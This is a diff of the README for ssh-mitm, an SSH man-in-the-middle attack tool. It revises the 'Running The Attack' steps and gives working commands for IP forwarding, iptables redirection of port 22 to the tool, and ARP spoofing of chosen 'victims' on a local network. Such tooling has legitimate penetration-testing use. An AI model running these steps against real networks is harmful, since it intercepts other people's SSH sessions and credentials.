jtesta/ssh-mitm/README.md

 ## Running The Attack

-0.)
-Run the *install.sh* script, as mentioned above (this only needs to be done once).

 1.)
-Run *sshd_mitm*:

-    sudo su - ssh-mitm -c "./run.sh"
+Once you've completed the initial setup and found a list of potential victims (see above), execute *run.sh* as root.
+This will execute *sshd_mitm*, enable IP forwarding, and set up SSH packet interception through *iptables*.

 2.)
-Enable IP forwarding:

-    sudo bash -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
-    sudo iptables -P FORWARD ACCEPT

-3.)
-Allow connections to *sshd_mitm* and re-route forwarded SSH connections:

-    sudo iptables -A INPUT -p tcp --dport 2222 -j ACCEPT sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

-4.)
-ARP spoof a target(s) (**Protip:** do NOT spoof all the things!
+ARP spoof the target(s) (**Protip:** do NOT spoof all the things!
 Your puny network interface won't likely be able to handle an entire network's traffic all at once.
 Only spoof a couple IPs at a time):

     arpspoof -r -t 192.168.x.1 192.168.x.5